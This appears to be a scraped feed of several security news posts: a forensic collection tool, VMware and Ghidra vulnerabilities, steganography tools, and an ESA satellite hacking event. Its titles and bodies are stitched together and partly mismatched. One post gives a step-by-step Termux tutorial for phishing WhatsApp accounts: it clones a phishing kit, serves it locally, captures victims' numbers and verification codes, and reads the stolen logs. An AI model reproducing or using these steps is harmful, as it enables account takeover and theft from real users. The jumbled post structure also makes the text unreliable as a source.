The post Best web application firewall testing tools: Find out what security solutions a target website is using. WAF hacking appeared first on Information Security Newspaper | Hacking News.

Specialists say that this research plays a fundamental role in the investigation of cybercriminal incidents, although sometimes researchers face multiple questions and crossroads during the analysis, increasing the workload unnecessarily. That is why it is necessary to find a way to make these processes more efficient.

On this occasion, experts from the cyber forensics course of the International Institute of Cyber Security (IICS) will show you Hoarder, a script created to collect and analyze the most valuable elements for forensic investigations or incident response instead of creating images of the entire hard drive.

Available on GitHub, this tool can represent a great advantage for cyber forensics investigation, lightening the workload of experts and allowing defining the most characteristic features of a cyberattack.

Tool usage

Hoarder analyzes the Hoarder.yml configuration and produces an extensive help message for ease of use, mention the experts of the cyber forensics course.

For example, if you want to collect all the artifacts specified in Hoarder.yml, you must use the following commands:

> .\hoarder.exe –all or > .\hoarder.exe -a or just > .\hoarder.exe

At the end of the execution, a ZIP file called <HOSTNAME>.zip will be generated, which contains all the artifacts in addition to hoarder.log which contains the debug records of the script.

To collect all artifacts with group tag analysis, run the command:

> .\hoarder.exe -g parsing

Configuration

The tool has a default configuration (Hoarder.yml):

• If you are running from the binary executable: The default Hoarder.yml settings are embedded in it. if you place your own hoarder.yml next to hoarder.exe you use it instead of the default settings
• If you are running from the source, you can modify Hoarder.yml or rename it and name your own Hoarder.yml configuration

Here’s an example of collecting and analyzing files or folders:

• Events: Name of the artifact. this name will be used as an argument on the hoarder command line
• Output: Output folder for this artifact
• path32: Path to the artifact for 32-bit systems
• path64: Path to artifact for 64-bit systems
• Files: File names
• Groups: They function as tags and each artifact can be configured to be part of one or more groups
• Parsers: One or more parsers to run this artifact

Parsing

Starting with version 4.0.0, Hoarder has support for the analysis of collected artifacts. As mentioned in the IICS cyber forensics course, there are three main parts to the analysis:

• parsers.zip: Contains the binaries, scripts, and data files of your parser To add your own parsers, place a parsers.zip file next to hoarder.exe containing all the parsers used
• configuration: in Hoarder.yml, add your parser command
• command-line arguments: -pa for the accumulator to bring raw and analyzed artifacts, and -n for the accumulator to bring only analysis results

Commands and plugins

The researchers of the cyber forensics course mention that the tool contains the following features:

• Pluings: Preset functions within the script that can be called for specific results, such as processes and services
• Commands: Defined within Hoarder.yml to execute unique built-in commands

The tool also supports the execution of system commands. The following example shows the execution of the systeminfo command:

To learn more about information security risks, malware variants, vulnerabilities and information technologies, and more information on the cyber forensics course feel free to access the International Institute of Cyber Security (IICS) websites.

The post How to collect only valid evidence during forensic investigation and incident response processes instead of creating images of system memory appeared first on Information Security Newspaper | Hacking News.

During the event he highlighted the work of the Kunlun Lab hacking team, which won rewards of more than $650,000 USD for their work demonstrating the exploitation of some of these flaws.

Below is a brief description of the failures addressed according to a company report:

• CVE-2021-22040: A use-after-free error in the ESXi, Workstation, and Fusion XHCI USB driver whose exploitation would allow local threat actors with administrator privileges to execute code as the VMX process of the virtual machine running on the host
• CVE-2021-22041: A bug in the ESXi, Workstation, and Fusion USB UHCI driver would allow local attackers with administrator privileges to execute code as the VMX process of a virtual machine running on the host
• CVE-2021-22042: Unauthorized access to settingsd in ESXi would allow malicious hackers within the VMX process to escalate their privileges on the affected system
• CVE-2021-22043: A settingsd TOCTOU error in ESXi that exists due to the way temporary files are handled would allow threat actors to escalate their privileges on the affected system

The firm has also announced some alternative solutions for administrators who cannot update their implementations at the moment, in addition to recommending that clients apply the measures they consider necessary as soon as possible since the successful exploitation of these failures could result in catastrophic scenarios.

Finally, VMware mentioned that these failures were notified to the Chinese government, in compliance with a recently enacted law that states that Chinese researchers who find zero-day vulnerabilities must notify government agencies and manufacturers of the affected technology directly. Researchers will not be able to sell this information to third parties outside of China unrelated to the manufacturer/developer.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post Chinese researchers find multiple vulnerabilities in VMware ESXi, Workstation and Fusion; update ASAP appeared first on Information Security Newspaper | Hacking News.

This time, specialists from the International Institute of Cyber Security (IICS) will show us some of the most popular steganography tools, used both by cybersecurity experts and hackers from around the world.

Before continuing, we remind you that this material was prepared for informational purposes only and should not be taken as a call to action; IICS is not responsible for the misuse that may occur to the information contained herein.

SilentEye

SilentEye is an open source tool used for steganography, mainly to hide messages in images or sounds. According to cybersecurity experts, the tool provides an easy-to-use interface and simple integration process for the new steganography algorithm and cryptography processes through a plugin system.

In this example, we have a pass.txt file that contains credentials to access information systems. Using SilentEye, this file is hidden in an image.

The tool can be downloaded from https://silenteye.v1kings.io/download.html?i2. When downloading, click the downloaded EXE file and follow the installation instructions. In addition to Windows, the installation files for Linux and MAC are available for download.

The process of steganography can be divided into these stages:

• Drag the image to the program launch window
• After adding the image, click on the encoding option

• Select the header position as “signature”, and enter a password position to access the file

• Select the file you want to hide in the image and click Encode
• The image will be saved in the destination folder specified in the previous step. We can see that the encoded image looks exactly the same and the hidden file is impossible to detect at simpe view
• To decode this image, click on the Decode option

• Select the title position as “signature” and enter the password that was used to encode this image, then select the Decode option

• The decoded file is shown below

iSTEG

This is an open source steganography tool that is used to hide files within a jpeg image. While it’s available only for Mac devices and is a relatively old program, it’s sure to prove to be a great source of learning for cybersecurity enthusiasts.

OpenStego

OpenStego is also an open source steganography tool that allows you to hide data in images or apply watermarks and detect unauthorized copies of specific files. The watermark can also be useful when sending the same document to different organizations with labels for each of them, allowing the source of possible leaks to be detected.

To hide data in the Message File field, select the file with the passwords you want to hide in the Cover File field and select the source image that will be the container for the text file. In the Output Stego File field, specify the name of the final image with the secret. Then, select the encryption algorithm (AES256 in this case) and set the password. Then click Hide Date to get the result.

Below we can notice that the image with the attachment is much larger than the original:

For reverse actions, respectively, on the Extract Data tab, you need to select a file with hidden data, select a path to save the file to the output, enter a password and click Extract Data and get the file passwords.txt.

As mentioned above, the functionality of the program also allows to put a watermark with a specific signature. You need to generate a signature file first and then it can be used to mark with water or validate.

You can generate an electronic signature in .sig format:

The result of adding the watermark is a signed image file isecforu_sig.jpg:

To check the watermark on the Verify Watermark tab, you need to select the file with the watermark and the signature file, respectively:

Open Puff

This is a free steganography software for Microsoft Windows and Linux systems. In addition to images and audio, it works with video and PDF files and includes detailed documentation to understand its use perfectly.

The tool supports image formats such as BMP, JPG, PCX, PNG, TGA, audio formats such as AIFF, MP#, NEXT/SUN, WAV, and video formats such as 3GP, FLV, MP4, MPG, SWF, and VOB, in addition to the popular PDF format.

To hide, it is proposed to enter 3 different passwords (A, B and C). However, passwords B and C can be disabled by unchecking the Enable (B) and Enable (C) parameters, so we will do this and enter the password in the A field. Then, in the Data block, select the file with passwords passwords .txt. In the third step, select the itsecforu.jpg image file as the media. Next, select the output file format and persistence, click Hide Data, and select a directory to save the file with hidden data.

To extract the file, you need to select Unhide from the start menu, enter the password in block A, select the itsecforu container.jpg and click Unhide:

As you can see, we get our password file.txt

The file tagging process is also simple and straightforward, so we won’t consider it.

Steghide

This is a program to hide data in various types of images and audio files. We wrote about this in the article “Steganography in Kali Linux – Hiding data in an image”. According to cybersecurity experts, the principle of operation is similar when working on the Windows operating system.

Run the utility from the command line and to see all available options:

To hide the password.txt file in the itsecforu.jpg image file, enter the following command:

steghide.exe embed -cf D:\stega\itsecforu.jpg -ef D:\stega\passwords.txt

Now the password and password confirmation are entered and the itsecforu file is obtained.jpg already with hidden data

Accordingly, to extract hidden data, enter the following command:

steghide.exe extract -sf D:\stega\itsecforu.jpg

Enter the password to get the password.txt file:

Spammic

Spammic.com is a website for converting messages into spam. This site gives users access to a program that turns short messages into spam in the form of a coded message, cybersecurity specialists note.

The tool would allow users to send confidential information via email with the confidence that threat actors will not identify the content, sharing it in a secure way.

This website includes a function known as “Encode as Fake Russian”, which allows you to encode a message in English with Cyrillic characters, readable enough for an operating person impossible to decipher for automated systems.

Cybersecurity experts recommend paying attention to the right resources.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post Top 6 free steganography tools for cyber security professionals appeared first on Information Security Newspaper | Hacking News.

Tracked as CVE-2021-44832, the flaw exists due to incorrect input validation in the application, which would allow remote users with permission to modify the log configuration file to construct a malicious configuration using an Appender JDBC with a data source that references a JNDI URI, leading to remote code execution (RCE).

The flaw received a score of 5.8/10 according to the Common Vulnerability Scoring System (CVSS) and its successful exploitation could put the entire exposed system at risk.

According to the report, the flaw lies in the following versions of Ghidra: 10.0, 10.0.1, 10.0.2, 10.0.3, 10.0.4, 10.1 and 10.1.1.

While the flaw can be exploited by remote and authenticated threat actors with high privileges, cybersecurity experts have not detected active exploitation attempts. Still, users of affected deployments are encouraged to update their version of Ghidra as soon as possible.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post Remote code execution vulnerability in Ghidra, NSA’s reverse engineering tool appeared first on Information Security Newspaper | Hacking News.

A growing trend within phishing is the compromise of WhatsApp accounts, the largest instant messaging platform in the world. Threat actors take advantage of the fact that minimal resources are required for the deployment of a phishing campaign against users of the application, using tools available in any forum of dubious reputation.

This time, the ethical hacking experts of the International Institute of Cyber Security (IICS) will show you a simple phishing attack to attack WhatsApp accounts, using just a few commands. As usual, we remind you that this article was prepared for informational purposes only and should not be taken as a call to action; IICS is not responsible for the misuse that may occur to the information contained herein.

This attack is based on Termux, the popular terminal emulator for Android devices that allows you to run a Linux environment on a smartphone with specific requirements. Once we have installed Termux, we will have to open the tool and write the following commands one by one (enter “y” when the system asks to choose between Y/N):

apt update
apt upgrade
apt install git
git clone https://github.com/Ignitetch/Whatsapp-phishing
apt install php
cd Whatsapp-phishing
php -S localhost:8080 

Next, experts in ethical hacking recommend typing in the browser the following command:

http://localhost:8080

The victim enters a number, for example:

+74959999999

In the next step, choose Sign In:

Now we must enter the code received in the phone number, for example 12345678

After logging in, it redirects the user to web.whatsapp.com:

Return to the terminal, ethical hacking experts mention:

Swipe right and in the window below, press New Session

On this menu, type the following command:

cat log.txt && cat logs.txt

In response, we will receive data from the victim:

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post How to hack WhatsApp easily with a very effective Termux WhatsApp phishing website appeared first on Information Security Newspaper | Hacking News.

This special event will take place during the annual Cysec conference, to be held next April. At this event, participants will have the opportunity to conduct security tests against the sophisticated OPS-SAT space satellite/laboratory, which will help the European space industry refine the cybersecurity of its implementations.

ESA points out that the exploitation of security flaws against technology such as OPS-SAT could generate severe failures in the services provided by the satellite, from Internet connectivity to telecommunications systems. On the other hand, the cybersecurity community estimates that cyberattacks generate losses of more than €500 million a year, so the best way to reduce these losses is the prevention of cyberattacks, testing the most advanced computer systems.

On the satellite in question, ESA mentions that THE OPS-SAT has already hosted various tests involving artificial intelligence, machine learning, deep learning and systems for financial transactions. Dave Evans, mission manager at OPS-SAT believes this is an ideal platform for ethical hackers to demonstrate their capabilities in a secure yet demanding environment: “This is an exciting opportunity to interact and learn from the best cybersecurity minds across Europe, using a platform developed specifically to learn and apply the knowledge gained in improving our current and future missions.” 

Candidates selected to participate in the event will have the opportunity to verify their cybersecurity experiments in space; in addition, three finalists will be selected evaluating the creativity of their ideas, the technical feasibility of the proposed experiments and the quality of their reports.

Applicants must submit their projects by February 18. If shortlisted, they will receive controlled technical access to OPS-SAT systems for a live demonstration. During the event, ethical hackers will only have six minutes to successfully complete their experiments.

What are your thoughts on this application of technology? Do you think it will be useful for the aerospace industry? Do you want to know more about similar projects? To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post European space agency wants cyber security experts to hack satellites and find vulnerabilities appeared first on Information Security Newspaper | Hacking News.